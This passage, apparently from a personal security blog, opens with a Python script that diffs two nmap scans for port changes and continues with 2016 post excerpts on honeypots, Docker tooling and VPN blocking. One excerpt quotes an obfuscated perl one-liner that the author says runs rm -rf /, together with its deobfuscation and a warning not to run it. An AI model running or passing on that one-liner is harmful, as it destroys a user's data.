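        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ports = set()
        for p in host.findall("ports/port"):
            if p.find("state").get("state") == "open":
                ports.add(f"{p.get('protocol')}/{p.get('portid')}")
        result[addr.get("addr")] = ports
    return result


def diff_scans(old_xml: str, new_xml: str) -> dict:
    """Hosts that appeared/vanished, and open ports that changed on hosts seen in both."""
    old, new = open_ports(old_xml), open_ports(new_xml)
    both = set(old) & set(new)
    return {
        "new_hosts": sorted(set(new) - set(old)),
        "gone_hosts": sorted(set(old) - set(new)),
        "opened": sorted((ip, port) for ip in both for port in new[ip] - old[ip]),
        "closed": sorted((ip, port) for ip in both for port in old[ip] - new[ip]),
    }


def format_message(d: dict) -> str:
    """Render a diff as the text you'd hand to a Slack webhook."""
    lines = [f"new host {ip}" for ip in d["new_hosts"]]
    lines += [f"host {ip} no longer responds" for ip in d["gone_hosts"]]
    lines += [f"{ip} opened {port}" for ip, port in d["opened"]]
    lines += [f"{ip} closed {port}" for ip, port in d["closed"]]
    return "\n".join(lines) if lines else "No changes."


if __name__ == "__main__":
    print(format_message(diff_scans(YESTERDAY, TODAY)))
```

On the sample data the message flags a new host, a host that dropped off, and RDP (tcp/3389) newly exposed on an existing host; the filtered 8080 on the new host is deliberately ignored.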
20 Oct 2016
I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like Burp). After spending much more time than I want to admit, I have it down to these 10 commands to bring an Ubuntu + MATE + XRDP desktop to an Ubuntu Droplet: sudo…
17 Oct 2016
Earlier this week someone sent me this one line perl script (that you shouldn’t run): perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Due to some really clever code obfuscation it runs rm -rf /. You can deobfuscate it (is that a word?) with this: perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"' While trying to figure out how this code worked I stumbled upon…
5 Oct 2016
Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500…
31 Aug 2016
I use nmap all the time at work and recently came across rainmap-lite, which is an amazing web interface for nmap that allows you to easily schedule and email scan results. I wanted to be able to share it with a class I am teaching so I did what I have been doing lately and put it into a Docker…
25 Aug 2016
One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with snort -dv -r test.pcap but the output is not great. I have been using a tool called websnort for…
17 Aug 2016
My friends at DigitalOcean were nice enough to give me a generous amount of credit on their cloud platform to do some security research with so I decided to do the most reckless thing I could think of and run a full ssh honeypot on the internet. The build out is pretty simple, it is the SSHoneypot Docker Container I…
1 Aug 2016
I am at Security Summer Camp this week and you always hear about how dangerous these networks are with no real proof, so I decided to see how dangerous they are*. I built the most insecure Docker container I can think of. It runs SSHD with the root password set to root* to see what happens when I…
25 Jul 2016
I took some time tonight and read through the Security Summer Camp (BSidesLV, Blackhat and Defcon) schedules and picked the talks from this year that I think will be the best and that I do not want to miss. I ended up with these 16 talks I am going to make a special point to see next week: BSidesLV Managing…
18 Jul 2016
Security Summer Camp (BSidesLV, Blackhat and Defcon) is the most important week in the security industry and as such you need to be prepared to network like a professional. Here are 6 things you can do this week to get ready: Freshen Up Your Social Media Profiles Is your Twitter profile picture 4 years old? Does your Twitter bio mention…
15 Jul 2016
We are two weeks away from Security Summer Camp (which is BSidesLV, Blackhat and Defcon)! So it is time for everyone to write their annual blog posts about what you must do before you head out. I want to be one of the cool kids so here is my list of 6 things to do before you pack: Delete All…
13 Jul 2016
While doing security research it is not uncommon for me to build and destroy between 20 and 25 cloud servers a week on Digital Ocean. While there are great guides like “My First 10 Minutes On a Server – Primer for Securing Ubuntu” and “My First 5 Minutes On A Server; Or, Essential Security for Linux Servers”, I do not have…
10 Jul 2016
There has been a lot of talk about why you should use a VPN on public networks and why it shouldn’t be a commercial one. I am a huge fan of the Streisand privacy stack because it includes an L2TP/IPsec VPN, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, and a Tor bridge all in one amazing package. The problem with Streisand…
9 Jul 2016
I worked with a consultant using the lair framework two years ago and since then I have been a huge fan of the project to manage pentest information. Tom Steele has done an amazing job with the project, but it has been a pain to install. Thanks to Ryan Hanson and Docker you can now set up a lair instance…
6 Jul 2016
One of the tips that security professionals love to give is to use a VPN on public wifi networks. This is great advice (I personally like PrivateInternetAccess and NordVPN). Recently I noticed nike.com blocks traffic from Tor and VPN providers: That got me wondering what other websites were blocking traffic from these sources so I decided to test the…
4 Jul 2016
I had a 2014 Dell Chromebook 11 I was not doing anything with, so I decided to turn it into a stand-alone Kali box using the Chromium OS Universal Chroot Environment. The installation steps are pretty simple: Add a l33t hacker sticker. Enable Developer Mode (this will wipe the device). Log in and download the latest crouton. Access the terminal by…
23 Jun 2016
A picture started floating around the internet of Mark Zuckerberg holding an Instagram cutout: People almost instantly started to notice that his webcam and mic were taped over. While Mark Zuckerberg isn't exactly known for having great security practices (all his social media passwords were Dadada), this started a discussion in the office about whether someone could really spy on you…
20 Jun 2016
While rebuilding my iPad this weekend I noticed that I could name it an emoji. So I named my iPad 📱(U+1F4F1): While I don’t have any problem using the iPad it basically makes it unreachable on the network via hostname. From there I renamed all of my lab machines emojis. Mostly variations of 💩 (U+1F4A9) because I am sophomoric: In…
12 Jun 2016
Earlier today I ran across this blog post on hijacking Windows .lnk files so I decided to build out and test a full PoC for it using Windows 8.1. To reproduce this just copy these 7 lines into PowerShell and Ctrl+C now runs calc.exe instead of copying your text: https://gist.github.com/jgamblin/4aa897a2cca6912eeea96a12d73d8cd6 For extra jerkiness this will shut down a Windows machine when…